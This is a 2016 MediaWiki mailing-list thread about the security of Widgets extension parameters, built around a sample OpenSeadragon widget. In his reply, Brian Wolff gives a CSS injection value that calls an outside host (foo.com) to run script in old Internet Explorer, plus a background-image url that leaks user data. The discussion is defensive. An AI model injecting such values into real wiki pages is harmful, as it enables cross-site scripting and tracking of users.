On Sat, Oct 29, 2016 at 3:40 PM, Brian Wolff <bawo...@gmail.com> wrote: > On Sat, Oct 29, 2016 at 2:50 PM, Dr. Michael Bonert > <mich...@librepathology.org> wrote: >> Hello, >> >> I was wondering about the security of Widgets ( >> https://www.mediawiki.org/wiki/Extension:Widgets ) that get parameters >> passed to them. Any thoughts? >> >> Are the parameters passed through to the widget cleansed of html/scripts? >> If it isn't -- is it possible to easily enforce typing/boundaries on the >> parameters? >> >> Generally, speaking, I am looking for a discussion around security & >> widgets. >> >> A widget I created (below) takes three parameters (width, height, filename) >> and feeds those to OpenSeadragon( https://openseadragon.github.io / >> https://en.wikipedia.org/wiki/Seadragon_Software ). It works on a testing >> server. >> >> OpenSeadragon was discussed in brain storming in 2015 - >> https://www.mediawiki.org/wiki/Reading/Quarterly_Brainstorming >> >> My interest in this is virtual (microscopic) slides (e.g. >> http://openslide.org/demo/ ) which are often >> several gigabytes of data each. >> >> Thanks, >> Michael >> >> ------------------------ >> Widget code... >> >> Create page: Widget:OpenSeadragon >> --------------------------------------------------------------------- >> <noinclude>__NOTOC__ >> <!-- Copyright (c) 2016 Michael Bonert --> >> <!-- Released under GNU General Public Licence - Version 3; see >> http://www.gnu.org/licenses/gpl.html --> >> To insert this widget, use the following code: >> >> <nowiki>{{#widget:</nowiki>{{PAGENAME}}<nowiki> >> |image=12881.dzi >> |width=800 >> |height=600 >> }}</nowiki> >> >> >> </noinclude> >> <includeonly><!-- This inserts an OpenSeadragon image --> >> <div id="openseadragon1" style="width: >> <!--{$width|default:400|escape:'html'}-->px; height: >> <!--{$height|default:300|escape:'html'}-->px;"></div> >> <script src="../../openseadragon/openseadragon.min.js"></script> >> <script type="text/javascript"> >> var viewer = OpenSeadragon({ >> id: "openseadragon1", >> prefixUrl: "../../openseadragon/images/", >> tileSources: "../../vslide/<!--{$image|escape:'urlpathinfo'}-->" >> }); >> </script> >> </includeonly> >> ------------------------------------------------- >> > > In theory that's what the escape modifier is for in smarty parameters. > > However, in this example, <!--{$width|default:400|escape:'html'}-->px; > inside a style attribute isn't really sufficient, as a user could set > a width parameter like "400; behavior: url( > 'https://foo.com/bar.htc#baz' );x: ", which would cause javascript > execution on IE9 and older. (There are other properties for other > browsers, however mostly affecting only older browsers). You could > also leak private info about your users by doing something like > background-image: url( "http://external.com/foo.png"; ) . > > [Disclaimer: I have not read the source code of the widgets extension, > so there could also potentially be generic security issues with the > extension. Since I haven't reviewed it, I don't really know]. > > -- > bawolff
Just as a p.s. I just poked around mediawikiwidgets.com . I looked at three widgets at random - all 3 had XSS vulnerabilities. Now of course, 3 is a very small sample size, so it may have been luck of the draw. Nevertheless, I'd like to take this moment to urge anyone using a widget made by someone else to review it carefully before use as many widgets are insecure. -- bawolff _______________________________________________ MediaWiki-l mailing list To unsubscribe, go to: https://lists.wikimedia.org/mailman/listinfo/mediawiki-l
![http://external.com/foo.png"](http://external.com/foo.png"){kind=link}